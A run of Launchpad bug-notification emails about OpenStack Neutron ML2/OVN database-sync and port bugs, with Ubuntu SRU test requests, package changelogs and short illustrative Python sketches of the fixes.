https://bugs.launchpad.net/bugs/2008943 Title: OVN DB Sync utility cannot find NB DB Port Group Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Committed Status in Ubuntu Cloud Archive xena series: Fix Released Status in neutron: In Progress Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: The runtime exception ovsdbapp.backend.ovs_idl.idlutils.RowNotFound: Cannot find Port_Group with name=pg_aa9f203b_ec51_4893_9bda_cfadbff9f800 can occur while performing a database sync between the Neutron DB and the OVN NB DB using neutron-ovn-db-sync-util. This exception occurs when the `sync_networks_ports_and_dhcp_opts()` function ends up implicitly creating a new default security group for a tenant/project id. This is normally OK, but the problem is that `sync_port_groups` was already called, so the port group does not exist in the NB DB. When `sync_acls()` is called later, no port group is found and the exception occurs.

Quick way to reproduce on ML2/OVN:
- openstack project create test_project
- openstack network create --project test_project test_network
- openstack port delete $(openstack port list --network test_network -c ID -f value)  # since this is an empty network, only the metadata port should get listed and subsequently deleted
- openstack security group delete test_project

So now that you have a network without a metadata port in it and no default security group for the project/tenant that this network belongs to, run:

neutron-ovn-db-sync-util --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini --ovn-neutron_sync_mode migrate

The exception should occur. Here is a more realistic scenario of how we can run into this with an ML2/OVS to ML2/OVN migration. I am also including why the code runs into it. 1.
An ML2/OVS environment with a network but no default security group for the project/tenant associated with the network.
2. Perform the ML2/OVS to ML2/OVN migration. This migration process will run neutron-ovn-db-sync-util with --migrate.
3. During the sync, we first sync port groups [1] from the Neutron DB to the OVN DB.
4. Then we sync network ports [2]. The process will detect that the network in question is not part of the OVN NB. It will create that network in the OVN NB DB and, along with that, create a metadata port for it (an OVN network requires a metadata port). The port-create call will implicitly notify _ensure_default_security_group_handler [3], which will not find a security group for that tenant/project id and will create one. Now you have a new security group with 4 new default security group rules.
5. When sync_acls [4] runs, it will pick up those 4 new rules, but the commit to the NB DB will fail since the port group (aka security group) does not exist in the NB DB.

[1] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L104
[2] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L10
[3] https://opendev.org/openstack/neutron/src/branch/master/neutron/db/securitygroups_db.py#L915
[4] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L107

= Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Follow the steps in "Quick way to reproduce on ML2/OVN" from the bug description. [Where problems could occ
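The ordering bug can be shown as a toy simulation (not neutron code): a default security group created as a side effect of the port sync has no NB port group by the time the ACL sync runs. The resync_port_groups flag below is a hypothetical stand-in for the upstream fix of reconciling port groups before syncing ACLs.

```python
# Toy model of the neutron-ovn-db-sync-util ordering: security groups in the
# Neutron DB must have a matching pg_* Port_Group in the OVN NB DB.
class RowNotFound(Exception):
    pass

class FakeOvnDbSync:
    def __init__(self):
        self.neutron_sgs = {"sg-existing"}
        self.nb_port_groups = set()

    def sync_port_groups(self):
        # Mirror every currently known security group into the NB DB.
        self.nb_port_groups = {"pg_" + sg for sg in self.neutron_sgs}

    def sync_networks_ports_and_dhcp_opts(self):
        # Creating the metadata port implicitly creates a default SG.
        self.neutron_sgs.add("sg-new-default")

    def sync_acls(self, resync_port_groups=False):
        if resync_port_groups:
            self.sync_port_groups()  # the fix: pick up SGs created mid-sync
        for sg in self.neutron_sgs:
            if "pg_" + sg not in self.nb_port_groups:
                raise RowNotFound("Cannot find Port_Group with name=pg_" + sg)
```

Running the three phases in the original order raises RowNotFound; re-reconciling port groups before the ACL pass does not.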
[Yahoo-eng-team] [Bug 2030773] Please test proposed package
Hello Lucas, or anyone else affected, Accepted neutron into wallaby-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:wallaby-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-wallaby-needed to verification-wallaby-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-wallaby-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/wallaby Status: Fix Released => Fix Committed ** Tags added: verification-wallaby-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
https://bugs.launchpad.net/bugs/2030773 Title: OVN DB Sync always logs warning messages about updating all router ports Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Committed Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: Reported at: https://bugzilla.redhat.com/show_bug.cgi?id=2225156 The ovn-db-sync script does not check whether the router ports are actually out of sync before adding them to the list of ports that need to be updated. This can create red-herring problems by introducing an irrelevant piece of information [0] in the sync report (especially when run in "log" mode), making the user think that the databases might be out of sync even when they are not. Looking at the code [1], we can see that the comment talks about checking the networks and ipv6_ra_configs changes, but the code does neither; instead, it adds every router port to the list of ports that need to be updated.

    # We dont have to check for the networks and
    # ipv6_ra_configs values. Lets add it to the
    # update_lrport_list. If they are in sync, then
    # update_router_port will be a no-op.
    update_lrport_list.append(db_router_ports[lrport])

This LP is about changing this behavior and checking for such differences in the router ports before marking them to be updated.
[0] 2023-07-24 11:46:31.391 952358 WARNING networking_ovn.ovn_db_sync [req-1081a8a6-82dd-431c-a2ab-f58741dc1677 - - - - -] Router Port port_id=f164c0f1-8ac8-4c45-bba9-8c723a30c701 needs to be updated for networks changed [1] https://github.com/openstack/neutron/blob/c453813d0664259c4da0d132f224be2eebe70072/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L553-L557 = Ubuntu SRU Details = [Impact] See bug description above. [Test Case] Deploy openstack with OVN and multiple routers. Run the ovn-db-sync script and ensure router ports that are not out of sync are not marked to be updated. [Where problems could occur] If the _is_router_port_changed() function had a bug, there would be potential for ports that need updating to be filtered out. Presumably this is not the case, but that is a theoretical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2030773/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
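The check the fix introduces can be sketched as below. This is a minimal illustration, not the upstream code; the function name `_is_router_port_changed` comes from the SRU notes above, while the data shapes and the `collect_ports_to_update` helper are assumptions for the sketch.

```python
# Sketch: only mark a router port for update when the attributes the
# sync actually manages differ between Neutron and the OVN NB DB.
# Data shapes here are illustrative, not the upstream ones.

def _is_router_port_changed(db_port, ovn_port):
    """Return True if the Neutron view differs from the OVN NB view."""
    return (db_port.get('networks') != ovn_port.get('networks') or
            db_port.get('ipv6_ra_configs') != ovn_port.get('ipv6_ra_configs'))

def collect_ports_to_update(db_router_ports, ovn_router_ports):
    update_lrport_list = []
    for name, db_port in db_router_ports.items():
        ovn_port = ovn_router_ports.get(name, {})
        # Previously every port was appended unconditionally, producing
        # a spurious "needs to be updated" warning per router port.
        if _is_router_port_changed(db_port, ovn_port):
            update_lrport_list.append(db_port)
    return update_lrport_list
```

With this shape, an in-sync port generates neither a warning nor a no-op update transaction.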
[Yahoo-eng-team] [Bug 2032770] Please test proposed package
Hello Mustafa, or anyone else affected, Accepted neutron into wallaby-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:wallaby-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-wallaby-needed to verification-wallaby-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-wallaby-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/wallaby Status: Fix Released => Fix Committed ** Tags added: verification-wallaby-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
https://bugs.launchpad.net/bugs/2032770 Title: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Committed Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/neutron/+/892895 to the respective Ubuntu and UCA releases. The patch is merged to all the respective upstream branches (master & stable/[u,v,w,x,y,z,2023.1(a)]). This SRU intends to add the missing 'uplink-status-propagation' extension to ML2/OVN. This extension is already present and working in ML2/OVS, and it is supported by ML2/OVN, but the extension was never added to ML2/OVN. The patch simply adds the missing extension to ML2/OVN as well. The impact of this is visible for deployments migrating from ML2/OVS to ML2/OVN. The following command fails on ML2/OVN: ``` openstack port create --network 8d30fb08-2c6a-42fd-98c4-223d345c8c4f --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa # BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status' ``` The fix corrects this behavior by adding the missing extension. 
[Test Case] - Deploy a Focal/Yoga cloud: - ./generate-bundle.sh -s focal -r yoga --name test-focal-yoga-stack --run --ovn # After the dust settles - ./configure - source ./novarc - openstack port create --network --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa - It should fail with "BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status'" To confirm the fix, repeat the scenario and observe that the error disappears and port creation succeeds. [Regression Potential] The patch is quite trivial and should not affect any deployment negatively. The extension is optional and disabled by default. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2032770/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1955578] Re: OVN transaction could not be completed due to a race condition
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked from upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1955578 Title: OVN transaction could not be completed due to a race condition Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: When executing the test "test_connectivity_through_2_routers" it is highly possible to hit a race condition: networking_ovn.common.exceptions.RevisionConflict: OVN revision number for {PORT_ID} (type: ports) is equal or higher than the given resource. Skipping update. 
Bugzilla reference: https://bugzilla.redhat.com/show_bug.cgi?id=1860448 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Run the test_connectivity_through_2_routers test from https://github.com/openstack/neutron-tempest-plugin. This could also be tested manually based on what that test does. Ensure the router port status is not set to DOWN at any point. [Where problems could occur] The existing bug could still occur if the assumption behind specifying the port type is not correct. Presumably this is not the case, but that is a theoretical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1955578/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
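A rough sketch of the idea behind the "specify port type if it's a router port when updating" patch: include the port's type when building the update, so a router-backed logical switch port is never transiently treated as an ordinary VIF port. All names below are illustrative stand-ins, not the neutron or ovsdbapp API; only the `'router'` port type and the device-owner values mirror real OVN/Neutron conventions.

```python
# Hypothetical helper: build the column set for a logical switch port
# update. Before the fix, omitting 'type' on a router port allowed a
# race where the port briefly lost its router type and flapped DOWN.

ROUTER_PORT_OWNERS = ('network:router_interface',
                      'network:router_gateway')

def lsp_update_columns(port):
    columns = {'external_ids': {'neutron:device_owner':
                                port['device_owner']}}
    if port['device_owner'] in ROUTER_PORT_OWNERS:
        # Always restate the type for router ports so the update can
        # never be observed with the type momentarily unset.
        columns['type'] = 'router'
    return columns
```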
[Yahoo-eng-team] [Bug 1961112] Re: [ovn] overlapping security group rules break neutron-ovn-db-sync-util
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked from upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1961112 Title: [ovn] overlapping security group rules break neutron-ovn-db-sync-util Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Neutron (Xena) is happy to accept equivalent rules with overlapping remote CIDR prefix as long as the notation is different, e.g. 10.0.0.0/8 and 10.0.0.1/8. However, OVN is smarter: it normalizes the prefix and figures out that both are 10.0.0.0/8. 
This does not have any fatal effects in a running OVN deployment (creating and using such rules does not even trigger a warning), but upon running neutron-ovn-db-sync-util, it crashes and won't perform a sync. This is a blocker for upgrades (and other scenarios). Security group's rules:

$ openstack security group rule list overlap-sgr
+--------------------------------------+-------------+-----------+------------+------------+-----------+-----------------------+----------------------+
| ID                                   | IP Protocol | Ethertype | IP Range   | Port Range | Direction | Remote Security Group | Remote Address Group |
+--------------------------------------+-------------+-----------+------------+------------+-----------+-----------------------+----------------------+
| 3c41fa80-1d23-49c9-9ec1-adf581e07e24 | tcp         | IPv4      | 10.0.0.1/8 |            | ingress   | None                  | None                 |
| 639d263e-6873-47cb-b2c4-17fc824252db | None        | IPv4      | 0.0.0.0/0  |            | egress    | None                  | None                 |
| 96e99039-cbc0-48fe-98fe-ef28d41b9d9b | tcp         | IPv4      | 10.0.0.0/8 |            | ingress   | None                  | None                 |
| bf9160a3-fc9b-467e-85d5-c889811fd6ca | None        | IPv6      | ::/0       |            | egress    | None                  | None                 |
+--------------------------------------+-------------+-----------+------------+------------+-----------+-----------------------+----------------------+

Log excerpt:
16/Feb/2022:20:55:40.568 527216 INFO neutron.cmd.ovn.neutron_ovn_db_sync_util [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Sync for Northbound db started with mode : repair
16/Feb/2022:20:55:42.105 527216 INFO neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.extensions.qos [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Starting OVNClientQosExtension
16/Feb/2022:20:55:42.380 527216 INFO neutron.db.ovn_revision_numbers_db [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Successfully bumped revision number for resource 49b3249a-7624-4711-b271-3e63c6a27658 (type: ports) to 17
16/Feb/2022:20:55:43.205 527216 WARNING neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_db_sync [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] ACLs-to-be-added 1 ACLs-to-be-removed 0
16/Feb/2022:20:55:43.206 527216 WARNING neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_db_sync [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] ACL found in Neutron but not in OVN DB for port group pg_e90b68f3_9f8d_4250_9b6a_7531e2249c99
16/Feb/2022:20:55:43.208 527216 ERROR 
ovsdbapp.backend.ovs_idl.transaction [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Traceback (most recent call last): File "/usr/lib/python3/dist-packages/ovsdbapp/backend/ovs_idl/connection.py", line 131, in run txn.results.put(txn.do_commit()) File
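The overlap that trips the sync utility is easy to demonstrate with Python's standard `ipaddress` module, which applies the same normalization OVN does:

```python
import ipaddress

# Neutron accepted both rules because the textual prefixes differ, but
# after normalization they are the same network -- which is why OVN
# ends up with one ACL where Neutron holds two rules.
# strict=False allows host bits to be set, mirroring Neutron's input.
a = ipaddress.ip_network('10.0.0.1/8', strict=False)
b = ipaddress.ip_network('10.0.0.0/8')
print(a == b)  # both normalize to 10.0.0.0/8
```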
[Yahoo-eng-team] [Bug 2008943] Re: OVN DB Sync utility cannot find NB DB Port Group
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked from upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
https://bugs.launchpad.net/bugs/2008943 Title: OVN DB Sync utility cannot find NB DB Port Group Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in neutron: In Progress Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Runtime exception: ovsdbapp.backend.ovs_idl.idlutils.RowNotFound: Cannot find Port_Group with name=pg_aa9f203b_ec51_4893_9bda_cfadbff9f800 can occur while performing a database sync between the Neutron DB and the OVN NB DB using neutron-ovn-db-sync-util. This exception occurs when the `sync_networks_ports_and_dhcp_opts()` function ends up implicitly creating a new default security group for a tenant/project id. This is normally ok, but the problem is that `sync_port_groups` was already called and thus the port group does not exist in the NB DB. When `sync_acls()` is called later, the port group is not found and the exception occurs. Quick way to reproduce on ML2/OVN: - openstack project create test_project - openstack network create --project test_project test_network - openstack port delete $(openstack port list --network test_network -c ID -f value) # since this is an empty network only the metadata port should get listed and subsequently deleted - openstack security group delete test_project So now that you have a network without a metadata port in it and no default security group for the project/tenant that this network belongs to, run neutron-ovn-db-sync-util --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini --ovn-neutron_sync_mode migrate The exception should occur. Here is a more realistic scenario of how we can run into this with an ML2/OVS to ML2/OVN migration. I am also including why the code runs into it. 1. 
ML2/OVS environment with a network but no default security group for the project/tenant associated with the network 2. Perform the ML2/OVS to ML2/OVN migration. This migration process will run neutron-ovn-db-sync-util with --migrate 3. During the sync we first sync port groups [1] from the Neutron DB to the OVN DB 4. Then we sync network ports [2]. The process will detect that the network in question is not part of the OVN NB. It will create that network in the OVN NB DB and, along with it, a metadata port (an OVN network requires a metadata port). The port-create call will implicitly notify _ensure_default_security_group_handler, which will not find a security group for that tenant/project id and will create one. Now you have a new security group with 4 new default security group rules. 5. When sync_acls [4] runs it will pick up those 4 new rules, but the commit to the NB DB will fail since the port group (aka security group) does not exist in the NB DB [1] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L104 [2] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L10 [3] https://opendev.org/openstack/neutron/src/branch/master/neutron/db/securitygroups_db.py#L915 [4] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L107 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OV
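The ordering problem in steps 3-5 above can be reduced to a few lines of stand-in code. Everything here is a simplified stand-in for the real sync utility, not the neutron implementation; only the failure shape (a port group looked up after the port-group sync snapshot was taken) mirrors the bug.

```python
# Minimal sketch of the ordering bug with toy stand-in functions.
# sync_port_groups() snapshots the security groups known at that time;
# a default SG created later as a side effect of port creation is
# absent from the snapshot, so sync_acls() references a missing group.

nb_port_groups = set()          # toy stand-in for OVN NB Port_Group rows
neutron_security_groups = set() # toy stand-in for Neutron SG rows

def sync_port_groups():
    nb_port_groups.update('pg_' + sg for sg in neutron_security_groups)

def create_port(project_id):
    # Port creation implicitly ensures a default SG for the project.
    neutron_security_groups.add(project_id + '_default')

def sync_acls():
    for sg in neutron_security_groups:
        pg = 'pg_' + sg
        if pg not in nb_port_groups:
            # The real utility raises idlutils.RowNotFound here.
            raise LookupError('Cannot find Port_Group with name=' + pg)

sync_port_groups()
create_port('tenant1')  # implicitly creates a new default SG
try:
    sync_acls()
    failed = False
except LookupError:
    failed = True
```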
[Yahoo-eng-team] [Bug 2030773] Re: OVN DB Sync always logs warning messages about updating all router ports
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked from upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
https://bugs.launchpad.net/bugs/2030773 Title: OVN DB Sync always logs warning messages about updating all router ports Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: Reported at: https://bugzilla.redhat.com/show_bug.cgi?id=2225156 The ovn-db-sync script does not check whether the router ports are actually out of sync before adding them to the list of ports that need to be updated. This can create red-herring problems by introducing an irrelevant piece of information [0] into the sync report (especially when run in "log" mode), making the user think that the databases might be out of sync even when they are not. Looking at the code [1] we can see that the comment talks about checking for networks and ipv6_ra_configs changes, but it does neither; instead, it adds every router port to the list of ports that need to be updated. # We dont have to check for the networks and # ipv6_ra_configs values. Lets add it to the # update_lrport_list. If they are in sync, then # update_router_port will be a no-op. update_lrport_list.append(db_router_ports[lrport]) This LP is about changing this behavior and checking for such differences in the router ports before marking them for update. 
[0] 2023-07-24 11:46:31.391 952358 WARNING networking_ovn.ovn_db_sync [req-1081a8a6-82dd-431c-a2ab-f58741dc1677 - - - - -] Router Port port_id=f164c0f1-8ac8-4c45-bba9-8c723a30c701 needs to be updated for networks changed [1] https://github.com/openstack/neutron/blob/c453813d0664259c4da0d132f224be2eebe70072/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L553-L557 = Ubuntu SRU Details = [Impact] See bug description above. [Test Case] Deploy openstack with OVN and multiple routers. Run the ovn-db-sync script and ensure router ports that are not out of sync are not marked to be updated. [Where problems could occur] If the _is_router_port_changed() function had a bug, there would be potential for ports that need updating to be filtered out. Presumably this is not the case, but that is a theoretical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2030773/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 2032770] Re: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked from upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
